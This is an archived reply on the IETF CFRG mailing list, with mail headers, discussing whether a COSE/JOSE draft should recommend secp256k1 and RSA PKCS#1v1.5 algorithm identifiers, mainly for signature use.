Re: [Cfrg] Recommending secp256k1 in FIPS 186-5

Neil Madden <> Thu, 19 December 2019 19:10 UTC

Return-Path: <>
Received: from localhost (localhost []) by (Postfix) with ESMTP id 50CC0120BAC for <>; Thu, 19 Dec 2019 11:10:35 -0800 (PST)
X-Virus-Scanned: amavisd-new at
X-Spam-Flag: NO
X-Spam-Score: -1.996
X-Spam-Status: No, score=-1.996 tagged_above=-999 required=5 tests=[BAYES_00=-1.9, DKIM_SIGNED=0.1, DKIM_VALID=-0.1, DKIM_VALID_AU=-0.1, FREEMAIL_FROM=0.001, HTML_MESSAGE=0.001, MIME_QP_LONG_LINE=0.001, RCVD_IN_DNSWL_NONE=-0.0001, SPF_HELO_NONE=0.001, SPF_PASS=-0.001, URIBL_BLOCKED=0.001] autolearn=ham autolearn_force=no
Authentication-Results: (amavisd-new); dkim=pass (2048-bit key)
Received: from ([]) by localhost ( []) (amavisd-new, port 10024) with ESMTP id Os-pItxcJfLO for <>; Thu, 19 Dec 2019 11:10:33 -0800 (PST)
Received: from ( [IPv6:2a00:1450:4864:20::42d]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (No client certificate requested) by (Postfix) with ESMTPS id 2BB2A120B17 for <>; Thu, 19 Dec 2019 11:10:33 -0800 (PST)
Received: by with SMTP id y17so7125146wrh.5 for <>; Thu, 19 Dec 2019 11:10:33 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;; s=20161025; h=content-transfer-encoding:from:mime-version:date:message-id:subject :in-reply-to:references:to:cc; bh=pWnyE3vW/ya1LPsvaVsVIEINzl2OnlfGp3FjbCMsuTU=; b=q1NcuBG2MQWnk1oAyV9O0gHr8iCosX5AotSrCGPJSQ0o4oO7RQqxqwOo7CXeoWjV+J RRgTmca6opmXiPCpd+Kkw4ZmfXwrvgaIwSRjzGBPZjD9ONdhD3cVyEcoLq+FVswlXy20 zBaBr+wI6Wz7rkxW0/01/hJHTnt7Ra7v6ZxiOl0+FucID0yP77LdKL5NFIGS8wqF2I9r uYH2n1KyoQ6lMrYT7UhDLM9yv/UXSI0XTmWN1/Qb4F8bGGZjfMJLBBl91C9HvAl0R6Pk 7dD/LrJi67Qdt3I1LTSsMSRM+XnZbksbRS8TArPtcIcdnCQC+sx99/zXZFnsH64nUc2K MxTQ==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;; s=20161025; h=x-gm-message-state:content-transfer-encoding:from:mime-version:date :message-id:subject:in-reply-to:references:to:cc; bh=pWnyE3vW/ya1LPsvaVsVIEINzl2OnlfGp3FjbCMsuTU=; b=Z+/JSaKsxeZynC58ecbLi8azDUKjgzzjrtMpEBB76SVVeljBg1qYXGlB/+mCg1/gin Zaplq3OxZlTdWJ07rNMNSM5TKjema5I8xhE7zpkqmT2BtLywPxMCXmk7BBBqO0mJ0HUD vyB43v6yb5Ayl7YjNa0C9XlhFj65aSrsqrgQpFoercUSJOWwg6cC7x/hf7ntll5KzSnk pA9vxKYlYPsq+FO2nn6mPMnpRK+UfuNjqPklJUQNu6zWIXYdp0PuskUK1OwlwSczycJ8 t0qSsHQ/uZ+MhCbZg/znOSsKoBNqlNRstdLxORZJt41NEYdseMrau17vDOCwE6zEZ9mo CRVA==
X-Gm-Message-State: APjAAAU08/NAwkSWtwAfIluMtIQOXGy5PzPT5RzVjvGxE+zYg7HgPj9R Yn4CZCPnshVmVGl0+7Rqjg8XoLVw
X-Google-Smtp-Source: APXvYqwevV/vsI2FUwjkRbesnsQxfBvAxVCWs0RiJJ6y3BdE68uKRyxtO+S2qPCIQL+nyn8Tnb5kpQ==
X-Received: by 2002:adf:c145:: with SMTP id w5mr11116139wre.205.1576782630371; Thu, 19 Dec 2019 11:10:30 -0800 (PST)
Received: from ?IPv6:2a01:4c8:19:c84c:e9d5:e683:a6e8:bd5f? ([2a01:4c8:19:c84c:e9d5:e683:a6e8:bd5f]) by with ESMTPSA id w13sm7473995wru.38.2019. (version=TLS1_3 cipher=TLS_AES_128_GCM_SHA256 bits=128/128); Thu, 19 Dec 2019 11:10:28 -0800 (PST)
Content-Type: multipart/alternative; boundary=Apple-Mail-A6A3DFCE-AC42-4F5F-A7A0-778BBBA4121B
Content-Transfer-Encoding: 7bit
From: Neil Madden <>
Mime-Version: 1.0 (1.0)
Date: Thu, 19 Dec 2019 19:10:26 +0000
Message-Id: <>
In-Reply-To: <>
References: <>
To: Tony Arcieri <>
Cc: Dan Burnett <>, CFRG <>
X-Mailer: iPhone Mail (17A878)
Archived-At: <>
Subject: Re: [Cfrg] Recommending secp256k1 in FIPS 186-5
X-Mailman-Version: 2.1.29
Precedence: list
List-Id: Crypto Forum Research Group <>
List-Unsubscribe: <>, <>
List-Archive: <>
List-Post: <>
List-Help: <>
List-Subscribe: <>, <>
X-List-Received-Date: Thu, 19 Dec 2019 19:10:35 -0000

>> On 19 Dec 2019, at 18:02, Tony Arcieri <> wrote:
>> On Thu, Dec 19, 2019 at 9:56 AM Neil Madden <> wrote:
>> But see ...
> I can't say I think too highly of a draft dated November 1st, 2019 which is recommending only RSASSA PKCS#1v1.5 and ECDSA w\ secp256k1.
> Especially in the case of the former this seems unwise given the lingering history of BB'06 (which continues to cause real-world breakages... there was a BlackHat talk about it this year)

Indeed. As I understand it that draft is registering algorithm identifiers already in use by WebAuthn/FIDO (TPM attestation I believe) and the RSA ones are all explicitly marked as non-recommended or immediately deprecated.

However, secp256k1 *is* currently marked as recommended in that draft. For signature use only; I managed to get explicitly wording added not recommending it for ECIES/“ECDH-ES” encryption, but I’m not aware of any specific weakness for ECDSA use so I didn’t argue against it for that. If there are concerns for signature use then it’d be good to raise them with the COSE WG now. 

(I had a brief look at that draft when it was brought to my attention as it also registers JOSE algorithms, which might impact my employer. I’ve not followed either that draft or the COSE WG very much since so I don’t know much about it beyond what is in the draft itself).

— Neil